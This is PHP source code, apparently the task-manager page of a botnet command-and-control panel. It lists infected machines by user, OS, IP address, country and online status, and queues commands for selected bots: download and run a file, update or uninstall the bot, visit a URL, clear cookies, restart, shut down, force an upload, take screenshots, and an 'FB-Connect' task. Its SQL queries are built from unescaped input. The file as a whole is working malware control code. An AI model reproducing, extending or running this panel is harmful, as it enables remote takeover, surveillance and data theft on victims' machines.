<?php
//TASK MANAGER//////////////////////////////////////////////////////////////////
function ShowTaskManager($fb)
{
    $html = ManageTask($fb);
    $title = $fb->panel->str['pageHead']['taskmanager'];
    
    show($fb->panel->str['bodyHeader'].$html.$fb->str['footer']."</div>", $title);
}

function topButtonTask($btn, $inst, $fb)
{
    $redBtn = "<span class='btn' style='color:#996666'>";
    $sBtn = "<span class='well' style='color:#990012'>";
    
    for ($i = 0; $i < count($btn); $i++)
    {
        if( $btn[$i] == $inst)
        {
            $btn[$i] = $sBtn;
        }else{ $btn[$i] = $redBtn; }
    }
    
    return $html = "<ul class='nav nav-tabs'>
    <li><a href='?action=taskmanager&type=bots'>".$btn[0].$fb->panel->str['misc']['bots']."</span></a></li>
    <li><a href='?action=taskmanager&type=tasks'>".$btn[1].$fb->panel->str['misc']['tasks']."</span></a></li></ul>";
}

function ManageTask($fb)
{
    getTaskManager_str( $fb );
    
    $headBtn = '';
    $btn = array("bots","tasks");
    $inst = ''; $head = ''; $headbtn = '';
    
    if( (has_get("type") && get("type") == 'tasks') || checkTask($fb) )  { 
        $inst = "tasks"; $head = $fb->panel->str['taskHead']; $headbtn = $fb->panel->str['TaskBtn2'];
    }
    else  { 
        $headBtn = "<p>".substr($fb->panel->str['TaskBtn1'],0,-19)."</p>";
        $inst = "bots"; $head = botStats($fb).$fb->panel->str['staskForm'].$fb->panel->str['installHead']; 
        $headbtn = $fb->panel->str['TaskBtn1'];
        if( isset($_SESSION["botinit"]) && $_SESSION["botinit"] ) { botRefresh($fb); }
    }
    
    $html = topButtonTask($btn, $inst, $fb).$fb->panel->str['taskError'];
    
    return $html.$head.$headBtn.TableBot($fb, $inst).
    "</tbody></table><div id='pages'><div id='numbers'></div><div id='buttons'>".$headbtn;
}

function TableBot($fb, $Type)
{
    $p_str = $fb->panel->str;
    $misc_str = $fb->panel->str['misc'];
    $result = mysqli_query($fb->mysql, "SELECT * FROM ".$Type);
    
    if(!$result)  {
        die(mysqli_error($fb->mysql)); exit();
    }
    
    tAct($fb, $Type);
    
    $st = 0;
    $html = ''; $botsid = ''; $url = ''; $task = ''; $Country = ''; $status = '';
    
    while ( $row = mysqli_fetch_array($result) ) 
    {
        if($Type == "tasks")
        {
            $url = empty($row["url"]) ? "NA" : $row["url"];
        
            if( strlen($row["botsid"]) > 46)
            {
                $botsid = substr($row["botsid"],0,46)."...";
            }
            else { $botsid = $row["botsid"]; }
            
            $tlist = array('',"td_e","tupbin","tunbin","tvisit","tclearc","trestart","tshutdown",
            "tforceupload","tscreeshot","FB-Connect","td_e","tupbin"); 
            $misc_str["FB-Connect"] = "FB-Connect";
            for ($i = 1; $i < count($tlist); $i++)
            {
                if( $row["task"] == $i ) 
                {
                    $task = $misc_str[$tlist[$i]]; break;
                }
            }
            
            if( $row["status"] == 0 ) {
                $status = "<td>".$p_str['toff']."</td>";
            }
            else if( $row["status"] == 1 ) {
                $status = "<td>".$p_str['ton']."</td>";
            }
            else if( $row["status"] == 2 ) {
                $status = "<td>".$p_str['tErr']."</td>";
            }
            else if( $row["status"] == 3 ) {
                $status = "<td>".$p_str['tdone']."</td>";
            }
        
            $html .= "<tr> <td> <span style='color:#990012'><b>#".$row["id"]."</b></span></td>";
            $html .= "<td> ".$task."</td>";
            $html .= "<td> ".$url."</td>";
            $html .= "<td> ".$botsid."</td>";
            $html .= "<td> ".$row["botnum"]."</td>";
            $html .= "<td> ".$row["executed"]."</td>";
            $html .= "<td> ".$row["failed"]."</td>";
            $html .= $status;
        }
        else
        {
            $Country = $row["countryNumber"];
            $stat = (isset($row['status'])&&$row['status']);
            $bv = isset($row['bv']) ? '0.'.$row['bv'] : 'null';
            
            $html .= "<tr> <td> ".$row["botID"]."</td>";
            $html .= "<td> ".$row["user"]."</td>";
            $html .= "<td> ".getOst($row)."</td>";
            $html .= "<td> ".$row["os"]."</td>";
            $html .= "<td>" .getCountry($Country). "</td>" . "<td>" .getFlag($Country). "</td>";
            $html .= "<td> ".$row["ip"]."</td>";
            $html .= "<td> ".$row["insdate"]."</td>";
            $html .= "<td> ".$row["actdate"]."</td>";
            $html .= "<td> ".$bv."</td>";
            $html .= "<td> ".$row["task"]."</td>";
            if( (strtotime(date("Y-m-d H:i:s")) - strtotime($row["actdate"])) < 960 )//960 secs
            {
                $st = 1;
                $html .= $stat ? "<td>".$p_str['blocked']."</td>" : "<td>".$p_str['bonline']."</td>"; 
            }
            elseif( (strtotime(date("Y-m-d H:i:s")) - strtotime($row["actdate"])) > 1209600 )//2weeks in secs
            {
                $html .= "<td>".$p_str['bdead']."</td>"; $st = 3;
            }
            else{ $html .= "<td>".$p_str['boffline']."</td>"; $st = 2; }
        }
        
        $html .= "<td><input type='checkbox' name='sel[]' value='".$row["id"]."'>
                 <input type='hidden' name='st[]' value='".$st."'></td></tr>";
    }
    
    return $html;
}

function checkTask($fb)
{
    $p_str = $fb->panel->str;
    $taskError = &$fb->panel->str['taskError'];
    
    if( !has_post("taskType") || !has_post("tUrl") ){return false;}
    
    $taskType = post("taskType"); $filePath = post("tUrl");
    
    if( !$fb->vPro ) { 
        $taskError = taskError($p_str['err']['proErr']);
        return false;
    }
    
    if( !Perm(3) ) { header("Location: ".server('HTTP_REFERER')); exit(); }
    
    if( has_post("tact") && post("tact") == '7' )  { return false; }
    
    if( $taskType == 10 ||  $taskType == 11 || $taskType == 12 ) 
    { 
        require_once 'script/fbConnect/fbc_Task.php';
        if( !fbc_checkTask($fb, $taskType, $filePath) ) { return false; }    
    }
    
    if( $taskType == 1 || $taskType == 2)
    {
        if( $filePath == '' ) { $taskError = taskError($p_str['err']['fileErr']); return false; }
        
        if( !is_file($filePath) || !is_readable($filePath) )
        { 
            $filePath = server('DOCUMENT_ROOT').parse_url($filePath, PHP_URL_PATH);
            if( !is_file($filePath) || !is_readable($filePath) ) {
                $taskError = taskError($p_str['err']['fileErr']); return false; 
            }
        }
        
        if( filesize($filePath) > 1024000 )
        { $taskError = taskError($p_str['err']['sizeErr']); return false; }
    }
    
    elseif( $taskType == 3 || ($taskType >= 5 && $taskType <= 9) ) //uninstall or clear cookies
    { 
        $filePath = ''; 
    }
    
    elseif( $taskType == 4 && !filter_var($filePath, FILTER_VALIDATE_URL))
    { 
        $taskError = taskError($p_str['err']['urlErr']); return false; 
    }
    
    return AddTask($fb, $taskType, $filePath);
}

function taskError($err)
{
    return "<td> <div style='background-color: #ffffff; text-align: center;'> <b>
            <span style='color:#ff2121;'><b>error: ".$err."</b></span>
            </b></div> </td>";
}

function fbcError($fb, $err)
{
    $fb->panel->str['bodyHeader'] .= "<div style='background-color: #ffffff; text-align: center;'> <b>
            <span style='color:#ff2121;'><b>error: ".$err."</b></span></b></div>";
}

function taskSuccess($err)
{
    return "<td> <div style='background-color: #ffffff; text-align: center;'> <b>
            <span style='color:#10ab00;'><b>".$err."</b></span>
            </b></div> </td>";
}

function AddTask($fb, $taskType, $filePath)
{
    $botsid = '';
    $botArray = aray("sel");
    $p_str = $fb->panel->str;
    
    if( !mysqli_query($fb->mysql, "SELECT * FROM tasks") ) { 
        $p_str['taskError'] = taskError($p_str['err']['DBError']); return false; 
    }
    
    $result = select_id_list($fb, "bots", $botArray);
    
    if(!$result) { $p_str['taskError'] = taskError($p_str['err']['DBError2']); return false; }
    
    while( $row = mysqli_fetch_array($result) )
    {
        $botsid .= $row["botID"].":";
        $update = "UPDATE bots SET task='".++$row["task"]."' WHERE id='".$row["id"]."';";
        mysqli_query($fb->mysql,$update);
    }
    
    if( !mysqli_query($fb->mysql, "INSERT INTO tasks (`id`,`task`,`url`,`botsid`,`botnum`,`executed`,`failed`,`status`)
                    VALUES ('0','".$taskType."','".$filePath."','".$botsid."','".count($botArray)."','0','0','1')") )
    {
        $p_str['taskError'] = taskError($p_str['err']['DBError2']); return false;
    }
    
    header("Location: ?action=taskmanager&type=tasks");
    exit();
}

function tAct($fb, $Type)
{
    if( !has_post("tact") || post("tact") == '0' )  { 
        return false;
    }
    
    if( !Perm(3) ) { header("Location: ".server('HTTP_REFERER')); exit(); }
    
    $taskArray = aray("sel");
    $result = select_id_list($fb, $Type, $taskArray);
    
    if(!$result)  {
        die(mysqli_error($fb->mysql)); exit();
    }
    
    if( post("tact") == '1' )
    {
        while( $row = mysqli_fetch_array($result) )
        {
            if( $row["status"] != 2 && $row["status"] != 3 )
            {
                $val = 1 ? $row["status"] == 0 : 0;
                $update = "UPDATE ".$Type." SET status='".$val."' WHERE id='".$row["id"]."';";
                mysqli_query($fb->mysql,$update);
            }
        } 
    }
    else if( post("tact") == '2' || post("tact") == '7') 
    {
        while( $row = mysqli_fetch_array($result) )
        {
            $update = "DELETE FROM ".$Type." WHERE id='".$row["id"]."';";
            mysqli_query($fb->mysql,$update);
        } 
    }
    
    header("Location: ?action=taskmanager&type=".$Type);
    exit();
}

function botStats($fb)
{
    $dead = 0;
    $online = 0;
    $totalBot = 0;
    $ts = "<td style='width:20%;'>";
    
    $bot_result = mysqli_query($fb->mysql, "SELECT * FROM bots");
    if($bot_result)
    {
        $totalBot = mysqli_num_rows($bot_result);
    }
    
    while($row = mysqli_fetch_array($bot_result)) 
    {
        if( (strtotime(date("Y-m-d H:i:s")) - strtotime($row["actdate"])) < 960 )//960 secs
        {
            $online++;
        }
        elseif( (strtotime(date("Y-m-d H:i:s")) - strtotime($row["actdate"])) > 1209600 )//2weeks in secs
        {
            $dead++;
        }
    }
    $offline = $totalBot-($online+$dead);
    
    return " <ul> <div align='center'> <table style='width:80%; border:0;'> <tr>
            ".$ts.$fb->panel->str['misc']['ttbots'].": ".$totalBot."</td>
            ".$ts.$fb->panel->str['bonline'].$online."</td>
            ".$ts.$fb->panel->str['boffline'].$offline."</td>
            ".$ts.$fb->panel->str['bdead'].$dead."</td>
            </tr></table></div> </ul>";
}

function botRefresh($fb)
{
    $_SESSION["botinit"] = 0;
    $bots = mysqli_query($fb->mysql, "SELECT * FROM bots");
    if(!$bots) { return; }
    
    while($row = mysqli_fetch_array($bots)) 
    {
        $result = mysqli_query($fb->mysql, "SELECT * FROM bots WHERE botID='".$row["botID"]."';");
        
        if( $result && mysqli_num_rows($result) > 1 )
        {
            mysqli_query($fb->mysql, "DELETE FROM bots WHERE id='".$row["id"]."';");
        }
    }
}